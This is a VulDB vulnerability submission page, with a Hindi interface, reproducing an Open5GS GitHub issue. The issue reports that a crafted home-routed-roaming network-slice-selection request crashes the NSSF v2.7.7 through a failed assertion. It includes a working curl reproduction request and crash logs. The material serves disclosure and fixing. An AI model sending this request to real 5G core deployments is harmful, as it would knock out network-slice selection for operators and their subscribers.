जमा करें #808421: Open5gs NSSF v2.7.7 Denial of Serviceजानकारी

शीर्षक	Open5gs NSSF v2.7.7 Denial of Service
विवरण	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NSSF crashes when a client sends a `Home Routed Roaming` style `Nnssf_NSSelection` request containing both: - `home-plmn-id` - `slice-info-request-for-pdu-session.homeSnssai` and the local NSSF configuration does not populate `ogs_local_conf()->num_of_serving_plmn_id`. In the Home-NSSF branch, the handler unconditionally asserts that at least one serving PLMN is configured before it builds the discovery query toward the Home NSSF: ```c ogs_assert(ogs_local_conf()->num_of_serving_plmn_id); ``` In the live `basic` Docker deployment used here, `/home/ubuntu/docker-open5gs/configs/basic/nssf.yaml` has no `serving` block, so a single request can trigger the assertion and crash the process. ### Steps to reproduce ```bash IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nssf) curl --http2-prior-knowledge -m 5 -sS -i --get \ "http://$IP/nnssf-nsselection/v2/network-slice-information" \ --data-urlencode 'nf-id=test-amf' \ --data-urlencode 'nf-type=AMF' \ --data-urlencode 'home-plmn-id={"mcc":"999","mnc":"70"}' \ --data-urlencode 'slice-info-request-for-pdu-session={"sNssai":{"sst":1,"sd":"000001"},"homeSnssai":{"sst":1,"sd":"000001"},"roamingIndication":"HOME_ROUTED_ROAMING"}' ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nssf docker logs --tail 30 nssf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T18:15:35.794276249Z 04/10 18:15:35.690: [nssf] FATAL: nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf: Assertion `ogs_local_conf()->num_of_serving_plmn_id' failed. (../src/nssf/nnssf-handler.c:118) ``` ### Expected behaviour NSSF should reject the request with a normal HTTP error response such as `400 Bad Request` or `500 Internal Server Error` when Home-NSSF discovery cannot be constructed due to missing local serving PLMN configuration. ### Observed Behaviour The HTTP/2 stream is reset and the NSSF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
स्रोत	⚠️ https://github.com/open5gs/open5gs/issues/4432
उपयोगकर्ता	FrankyLin (UID 94345)
सबमिशन	20/04/2026 08:10 PM (1 महीना पहले)
संयम	07/05/2026 06:56 PM (17 days later)
स्थिति	स्वीकृत
VulDB प्रविष्टि	361907 [Open5GS तक 2.7.7 NSSF nnssf-handler.c सेवा अस्वीकार]
अंक	20

◂ पिछला सिंहावलोकन अगला ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!